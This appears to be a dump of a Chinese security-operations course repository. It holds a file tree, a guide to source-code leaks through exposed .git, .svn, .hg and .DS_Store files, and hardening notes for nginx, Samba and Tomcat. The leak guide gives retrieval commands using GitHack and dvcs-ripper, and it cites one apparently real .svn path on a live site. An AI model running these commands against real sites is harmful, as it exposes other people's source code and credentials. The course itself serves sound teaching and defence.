│ │ ├── nessie_icon_tiamat_white.png
│ │ ├── o%3fp=http%3A%2F%2Fwww.earsurgery.org%2F&r=http%3A%2F%2Fwww.google.at%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26frm%3D1%26source%3Dweb%26cd%3D1%26ved%3D0CCQQFjAA%26url%3Dhttp%253.bGQ&pid=2864&__js__=true
│ │ ├── o.js
│ │ ├── object4939.text%2fhtml
│ │ ├── object4988.text%2fhtml
│ │ ├── object4998.text%2fhtml
│ │ ├── osd.js
│ │ ├── overlay.png
│ │ ├── page-list.css%3fver=4.2
│ │ ├── pageview.gif%3freferrer=http%3A%2F%2Fwww.google.at%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26frm%3D1%26source%3Dweb%26cd%3D1%26ved%3D0CCQQFjAA%26url%3Dhttp%253A%252F%252Fwww.earsurgery.org%252F%26ei%.bGQ
│ │ ├── pixel%3fgoogle_hm=RrNUvHvjEeSDswAlkDXdQrxBTN0=&google_nid=chango&google_sc=&partner=adxhm&token=46b354bc-7be3-11e4-83b3-00259035dd42&uid=1
│ │ ├── pixel%3fgoogle_hm=RrNUvHvjEeSDswAlkDXdQrxBTN0=&google_nid=chango&google_sc=&partner=adxhm&token=46b354bc-7be3-11e4-83b3-00259035dd42&uid=1&google_tc=
│ │ ├── pixel%3fgoogle_nid=owneriq1&google_cm&google_sc&google_ula=1174&google_hm=UTQ3MTAwNDA4MDE1OTE3MjU3OTA=&esi=1&pt=sholic
│ │ ├── pixel%3fgoogle_nid=owneriq1&google_cm=&google_sc=&google_ula=1174&google_hm=UTQ3MTAwNDA4MDE1OTE3MjU3OTA=&esi=1&pt=sholic&google_tc=
│ │ ├── pxj%3fbidder=13&seg=703107&action=su('Q4710040801591725790');as(3727514514);as(3585802694);as(3588953253);
│ │ ├── relator%3fid=&partner=adxhm&token=46b354bc-7be3-11e4-83b3-00259035dd42&uid=1&google_error=3
│ │ ├── rum%3fcm_dsp_id=30&expiration=1417760880&external_user_id=46b354bc-7be3-11e4-83b3-00259035dd42
│ │ ├── s%3fv=r20120211
│ │ ├── s%3fv=r20120211(1)
│ │ ├── sd%3fcc=1&id=537072962&val=46b354bc-7be3-11e4-83b3-00259035dd42
│ │ ├── setuid%3fcode=46b354bc-7be3-11e4-83b3-00259035dd42&entity=62
│ │ ├── share_buttons.css
│ │ ├── shareaholic.js
│ │ ├── shareaholic_tools.js
│ │ ├── sholic.js
│ │ ├── show_ads_impl.js
│ │ ├── skip-link-focus-fix.js%3fver=20130115
│ │ ├── style.css%3fver=4.0
│ │ ├── suboptions.css
│ │ ├── tYJ9qCJyuXGuIc0n7tv1_SGXCxH__PG6BPqcKqZT2JA.js
│ │ ├── tap.php%3fexpires=30&nid=2245&put=46b354bc-7be3-11e4-83b3-00259035dd42&v=7727
│ │ ├── url%3fsa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&ved=0CCQQFjAA&url=http%3A%2F%2Fwww.earsurgery.org%2F&ei=e6eAVJGoBJbjaqm9gWg&usg=AFQjCNESqoW9ENBFsvEzZQIyl-s5KA1Rag&bvm=bv.80642063,d.bGQ
│ │ ├── vslider.js%3fver=4.0
│ │ ├── xPF_HAXN7TK9bMAgBjZDwQzO1-Wf5GvrN5_lIReIhbrhqHAlWyTDbaOBMPWitjnX
│ │ ├── x_button_blue2.png
│ │ └── zrt_lookup.html
│ ├── pic
│ │ ├── 2019-07-16-18-04-58.png
│ │ ├── 2019-07-18-09-29-15.png
│ │ ├── 2019-07-18-09-30-32.png
│ │ ├── 2019-07-18-10-17-05.png
│ │ ├── 2019-07-18-10-44-11.png
│ │ ├── 2019-07-18-16-33-19.png
│ │ ├── 2019-07-18-16-34-07.png
│ │ ├── 2019-07-18-16-36-54.png
│ │ ├── 2019-07-18-18-16-44.png
│ │ └── 2019-07-18-18-19-37.png
│ ├── writeup.md
│ └── 题目内容
│ │ ├── .DS_Store
│ │ ├── bak
│ │ ├── .DS_Store
│ │ └── 2014-12-04-traffic-analysis-exercise.pcap.zip
│ │ ├── traffic-analysis-exercise.pcap
│ │ └── 题目说明.md
├── 4
│ ├── .DS_Store
│ ├── 2014-12-08-traffic-analysis-exercise-answers.pdf
│ ├── writeup.md
│ └── 题目内容
│ │ ├── .DS_Store
│ │ ├── 2014-12-08-traffic-analysis-exercise.pcap
│ │ ├── bak
│ │ ├── .DS_Store
│ │ └── 2014-12-08-traffic-analysis-exercise.pcap.zip
│ │ └── 题目描述.md
├── .DS_Store
└── README.md
└── 防火墙:IDS:IPS
└── 防火墙.md
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | .vs
3 | .git
4 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | 本课程为开源课程,仅供学习,不要做商业使用。
2 |
3 | ```
4 | ├── README.md
5 | ├── 防火墙:IDS:IPS
6 | │ └── 防火墙.md
7 | ├── 数据泄露
8 | │ └── 文件泄露.md
9 | ├── 服务加固
10 | │ ├── apache加固.md
11 | │ ├── mysql加固.md
12 | │ ├── nginx加固.md
13 | │ ├── samba加固.md
14 | │ ├── ssh安全配置.md
15 | │ ├── tomcat加固.md
16 | │ └── 解析漏洞总结.txt
17 | ├── 流量分析
18 | │ ├── 1
19 | │ │ ├── 1.traffic-analysis-exercise-answers.pdf
20 | │ │ ├── page
21 | │ │ ├── pic
22 | │ │ ├── writeup_level1.md
23 | │ │ ├── writeup_level2.md
24 | │ │ ├── writeup_level3.md
25 | │ │ └── 题目内容
26 | │ ├── 2
27 | │ │ ├── 2.traffic-analysis-exercise-answers.pdf
28 | │ │ ├── page
29 | │ │ ├── pic
30 | │ │ ├── writeup.md
31 | │ │ └── 题目内容
32 | │ ├── 3
33 | │ │ ├── 3.traffic-analysis-exercise-answers.pdf
34 | │ │ ├── file
35 | │ │ ├── hex_xor.py
36 | │ │ ├── page
37 | │ │ ├── pic
38 | │ │ ├── writeup.md
39 | │ │ └── 题目内容
40 | │ ├── 4
41 | │ │ ├── 2014-12-08-traffic-analysis-exercise-answers.pdf
42 | │ │ ├── pic
43 | │ │ ├── writeup.md
44 | │ │ └── 题目内容
45 | │ └── README.md
46 | └── 木马病毒治理
47 | └── 克制不死马.txt
48 | ```
49 |
--------------------------------------------------------------------------------
/数据泄露/文件泄露.md:
--------------------------------------------------------------------------------
1 | **.hg源码泄漏**
2 | 漏洞成因:
3 |
4 | 执行 hg init 初始化仓库时会生成 .hg 目录
5 |
6 | `http://www.example.com/.hg/`
7 |
8 | 漏洞利用:
9 |
10 | >工具:dvcs-ripper
11 |
12 | `rip-hg.pl -v -u http://www.example.com/.hg/`
13 |
14 | **.git源码泄漏**
15 |
16 | 漏洞成因:
17 |
18 | 在运行 git init 初始化代码库时,会在当前目录下产生一个名为 .git 的隐藏目录,用来记录代码的变更历史等信息。如果在发布代码时没有删除 .git 目录,而是将其一同发布,那么借助这个目录就可以恢复出源代码。
19 |
20 | `http://www.example.com/.git/config`
21 |
22 | 漏洞利用:
23 |
24 | >工具:GitHack
25 |
26 | `GitHack.py http://www.example.com/.git/`
27 |
28 | >工具:dvcs-ripper
29 |
30 | `rip-git.pl -v -u http://www.example.com/.git/`
31 |
32 | **.DS_Store文件泄漏**
33 |
34 | 漏洞成因:
35 |
36 | 在发布代码时未删除文件夹中隐藏的 .DS_Store 文件,该文件被发现后,其中记录的文件名等敏感信息随之泄露。
37 |
38 | 漏洞利用:
39 |
40 | `http://www.example.com/.ds_store`
41 |
42 | 注意路径检查
43 |
44 | >工具:dsstoreexp
45 |
46 | `python ds_store_exp.py http://www.example.com/.DS_Store`
47 |
48 | **网站备份压缩文件**
49 |
50 | 在网站的使用过程中,往往需要对网站中的文件进行修改、升级。此时就需要对网站整站或者其中某一页面进行备份。当备份文件或者修改过程中的缓存文件因为各种原因而被留在网站web目录下,而该目录又没有设置访问权限时,便有可能导致备份文件或者编辑器的缓存文件被下载,导致敏感信息泄露,给服务器的安全埋下隐患。
51 |
52 | 漏洞成因及危害:
53 |
54 | 该漏洞的成因主要有以下两种:
55 |
56 | 服务器管理员错误地将网站或者网页的备份文件放置到服务器web目录下。
57 | 编辑器在使用过程中自动保存的备份文件或者临时文件因为各种原因没有被删除而保存在web目录下。
58 |
59 | 漏洞检测:
60 |
61 | 该漏洞往往会导致服务器整站源代码或者部分页面的源代码被下载、利用。源代码中所包含的各类敏感信息,如数据库连接信息、服务器配置信息等会因此泄露,造成巨大损失。被泄露的源代码还可能被用于代码审计,进一步被利用,从而给整个系统的安全埋下隐患。
62 | ```
63 | .rar
64 | .zip
65 | .7z
66 | .tar.gz
67 | .bak
68 | .swp
69 | .txt
70 | .html
71 | ```
72 |
73 | **SVN导致文件泄露**
74 |
75 | Subversion,简称 SVN,是一个开放源代码的版本控制系统。相对于 RCS、CVS,它采用了分支管理系统,其设计目标就是取代 CVS。互联网上越来越多的版本控制服务从 CVS 转移到 Subversion。
76 |
77 | Subversion使用服务端—客户端的结构,当然服务端与客户端可以都运行在同一台服务器上。在服务端是存放着所有受控制数据的Subversion仓库,另一端是Subversion的客户端程序,管理着受控数据的一部分在本地的映射(称为“工作副本”)。在这两端之间,是通过各种仓库存取层(Repository Access,简称RA)的多条通道进行访问的。这些通道中,可以通过不同的网络协议,例如HTTP、SSH等,或本地文件的方式来对仓库进行操作。
78 |
79 | `http://vote.lz.taobao.com/admin/scripts/fckeditor.266/editor/.svn/entries`
80 |
81 | 漏洞利用:
82 |
83 | >工具:dvcs-ripper
84 |
85 | `rip-svn.pl -v -u http://www.example.com/.svn/`
86 |
87 | **WEB-INF/web.xml泄露**
88 |
89 | WEB-INF是Java的WEB应用的安全目录。如果想在页面中直接访问其中的文件,必须通过web.xml文件对要访问的文件进行相应映射才能访问。
90 |
91 | WEB-INF 主要包含以下文件或目录:
92 |
93 | `/WEB-INF/web.xml`:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
94 | `/WEB-INF/classes/`:包含了站点所用的全部 class 文件,包括 servlet class 和非 servlet class,它们不能包含在 .jar 文件中
95 | `/WEB-INF/lib/`:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
96 | `/WEB-INF/src/`:源码目录,按照包名结构放置各个java文件。
97 | `/WEB-INF/database.properties`:数据库配置文件
98 |
99 | 漏洞成因:
100 |
101 | 通常一些 web 应用会搭配使用多个 web 服务器,以弥补单一 web 服务器的性能缺陷、实现负载均衡,以及完成一些分层结构的安全策略等。在使用这种架构时,如果对静态资源目录或文件的映射配置不当,就可能引发安全问题,导致 web.xml 等文件能够被读取。
102 |
103 | 漏洞检测以及利用方法:
104 |
105 | 通过找到 web.xml 文件,推断出 class 文件的路径,进而直接获取 class 文件,再通过反编译 class 文件得到网站源码。
106 | 一般情况下,jsp 引擎默认都禁止访问 WEB-INF 目录;问题多出现在 Nginx 配合 Tomcat 做负载均衡或集群的场景。原因其实很简单:Nginx 不是 jsp 引擎,不会把其他类型引擎的安全规范引入到自身配置中来(那样耦合性太高),因此需要在 Nginx 配置文件中显式禁止访问 WEB-INF 目录即可:location ~ ^/WEB-INF/* { deny all; } 或者 return 404; 或者其他方式。
107 |
108 | **CVS泄漏**
109 |
110 | 漏洞利用
111 |
112 | 测试的目录
113 |
114 | ```
115 | http://url/CVS/Root 返回根信息
116 | http://url/CVS/Entries 返回所有文件的结构
117 | ```
118 | 取回源码的命令
119 | ```
120 | bk clone http://url/name dir
121 | ```
122 | 这个命令的意思就是把远端一个名为name的repo clone到本地名为dir的目录下。
123 |
124 | 查看所有的改变的命令,转到download的目录
125 | ```
126 | bk changes
127 | ```
--------------------------------------------------------------------------------
/服务加固/nginx加固.md:
--------------------------------------------------------------------------------
1 | ## 1. 在Nginx中禁用server_tokens指令
2 |
3 | server_tokens 指令决定 nginx 是否在错误页面中显示其当前版本。这是不可取的,因为你不希望把版本信息公之于众,以免攻击者利用该特定版本中的已知漏洞对你的 Web 服务器发起攻击。需要注意,server_tokens off 只隐藏版本号,响应头中仍会标明服务器为 nginx。
4 |
5 | 要禁用 server_tokens,在 server 块内将其设置为 off:
6 | ```
7 | server {
8 | listen 192.168.0.25:80;
9 | server_tokens off;
10 | server_name howtoinglovesnginx.com www.howtoinglovesnginx.com;
11 | access_log /var/www/logs/howtoinglovesnginx.access.log;
12 | error_log /var/www/logs/howtoinglovesnginx.error.log error;
13 | root /var/www/howtoinglovesnginx.com/public_html;
14 | index index.html index.htm;
15 | }
16 | ```
17 |
18 | ## 2. 在Nginx中禁用不需要的HTTP方法
19 |
20 | 对于一般的网站和应用程序,你应该只允许 GET、POST 和 HEAD,并禁用所有其他方法;如果应用依赖 OPTIONS(例如 CORS 预检)或 PUT/DELETE(例如 REST API),则需要按实际需求放开相应方法。
21 |
22 | 为此,将以下代码放在 server 块中。444 响应表示 Nginx 不返回任何内容而直接关闭连接,常用于应对恶意请求:
23 | ```
24 | if ($request_method !~ ^(GET|HEAD|POST)$) {
25 | return 444;
26 | }
27 | ```
28 |
29 | ## 3. 在Nginx中设置缓冲区大小限制
30 | 为了防止针对 Nginx Web 服务器的缓冲区溢出攻击,将以下指令放在一个单独的文件中(例如创建 /etc/nginx/conf.d/buffer.conf):
31 |
32 | ```
33 | client_body_buffer_size 1k;
34 | client_header_buffer_size 1k;
35 | client_max_body_size 1k;
36 | large_client_header_buffers 2 1k;
37 | ```
38 |
39 | 上面的指令将确保对你的 Web 服务器的请求不会导致系统中的缓冲区溢出。注意:这些数值(尤其是 client_max_body_size 1k)需要根据实际业务调整,设置过小会导致正常的表单提交或文件上传被拒绝(返回 413)。
40 |
41 | 然后在配置文件中添加一个include指令:
42 | ```
43 | include /etc/nginx/conf.d/*.conf;
44 | ```
45 |
46 | ## 4. 日志设置
47 | 查看nginx.conf配置文件中,error_log、access_log前的“#”是否去掉
48 |
49 | 将error_log前的“#”去掉,记录错误日志
50 | 将access_log前的“#”去掉,记录访问日志
51 | 设置access_log,修改配置文件如下:
52 | ```
53 | log_format nsfocus '$remote_addr - $remote_user [$time_local] '
54 | ' "$request" $status $body_bytes_sent "$http_referer" '
55 | ' "$http_user_agent" "$http_x_forwarded_for"'; access_log logs/access.log nsfocus;
56 | ```
57 | nsfocus是设置配置文件格式的名称
58 |
59 | ## 5. 自定义错误信息
60 |
61 | 修改src/http/ngx_http_special_response.c,自己定制错误信息
62 | ```
63 | ## messages with just a carriage return.
64 | static char ngx_http_error_400_page[] = CRLF;
65 | static char ngx_http_error_404_page[] = CRLF;
66 | static char ngx_http_error_413_page[] = CRLF;
67 | static char ngx_http_error_502_page[] = CRLF;
68 | static char ngx_http_error_504_page[] = CRLF;
69 | ```
70 | 常见错误:
71 | ```
72 | 400 bad request
73 | 404 NOT FOUND
74 | 413 Request Entity Too Large
75 | 502 Bad Gateway
76 | 504 Gateway Time-out
77 | ```
78 |
79 | ## 6. 手动安装补丁或安装最新版本软件
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-47-11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-47-11.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-48-30.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-48-30.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-49-44.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-49-44.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-49-58.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-49-58.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-50-13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-50-13.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-50-22.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-50-22.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-50-45.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-50-45.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-51-03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-51-03.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-02-59-43.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-02-59-43.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-03-00-13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-03-00-13.png
--------------------------------------------------------------------------------
/服务加固/pic/FTP.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/FTP.png
--------------------------------------------------------------------------------
/服务加固/pic/ac.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/ac.png
--------------------------------------------------------------------------------
/服务加固/pic/app.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/app.png
--------------------------------------------------------------------------------
/服务加固/pic/ca1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/ca1.png
--------------------------------------------------------------------------------
/服务加固/pic/dc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/dc.png
--------------------------------------------------------------------------------
/服务加固/pic/ip.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/ip.png
--------------------------------------------------------------------------------
/服务加固/pic/log.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/log.png
--------------------------------------------------------------------------------
/服务加固/pic/pw.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/pw.png
--------------------------------------------------------------------------------
/服务加固/pic/sg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/sg.png
--------------------------------------------------------------------------------
/服务加固/samba加固.md:
--------------------------------------------------------------------------------
1 | Samba 是在 Linux 和 UNIX 系统上实现 SMB 协议的一个软件。2017 年 5 月 24 日 Samba 发布的 4.6.4 版本修复了一个严重的远程代码执行漏洞,漏洞编号为 CVE-2017-7494,影响 Samba 3.5.0 及之后、低于 4.6.4/4.5.10/4.4.14 的版本(4.6.4/4.5.10/4.4.14 为修复版本)。
2 |
3 | 1. 使用源码安装的Samba用户,请尽快下载最新的Samba版本手动更新;
4 |
5 | 2. 使用二进制分发包(RPM等方式)的用户立即进行yum,apt-get update等安全更新操作;
6 |
7 | 缓解策略:用户可以在 smb.conf 的 [global] 节点下增加 “nt pipe support = no” 选项,然后重新启动 Samba 服务,以此缓解该漏洞。该选项会禁止客户端访问命名管道,可能影响部分 Windows 客户端的功能,只应作为升级前的临时措施。
--------------------------------------------------------------------------------
/服务加固/tomcat加固.md:
--------------------------------------------------------------------------------
1 | Tomcat服务默认启用了管理后台功能,使用该后台可直接上传 war 文件包对站点进行部署和管理。由于运维人员的疏忽,可能导致管理后台存在空口令或者弱口令的漏洞,使得黑客或者不法分子可以利用该漏洞直接上传 Webshell 脚本导致服务器沦陷。
2 |
3 | 通常 Tomcat 后台管理的 URL 地址为 http://IP:8080/manager/html/
4 |
5 | 黑客通过猜解到的口令登录 Tomcat 管理后台后,可以上传 Webshell 脚本导致服务器被入侵。
6 |
7 | CVE-2017-12617影响范围:Apache Tomcat 7.0.0 – 7.0.81
8 |
9 | CVE-2017-12616影响范围:Apache Tomcat 7.0.0 – 7.0.80
10 |
11 | CVE-2017-12615影响范围: Apache Tomcat 7.0.0 – 7.0.79
12 |
13 | ## 安全加固方案
14 | 由于此类型漏洞可能对业务系统造成比较严重的危害,建议您针对 Tomcat 管理后台进行以下安全加固配置。
15 |
16 | 1. 网络访问控制
17 | 如果业务不需要使用 Tomcat 管理后台管理业务代码,可以使用安全组或防火墙功能对管理后台 URL 地址进行拦截,或直接将 Tomcat 部署目录中 webapps 文件夹下的 manager、host-manager 文件夹全部删除,并注释掉 Tomcat 目录中 conf 文件夹下 tomcat-users.xml 文件里的所有用户和角色定义。
18 |
19 | 如果业务系统确实需要使用 Tomcat 管理后台进行业务代码的发布和管理,建议为 Tomcat 管理后台配置强口令,并修改默认的 admin 用户名;密码长度不低于 10 位,且必须包含大写字母、特殊符号和数字的组合。
20 |
21 | 2. 开启 Tomcat 的访问日志
22 | 修改 conf/server.xml 文件,将下列代码取消注释:
23 | ```
24 |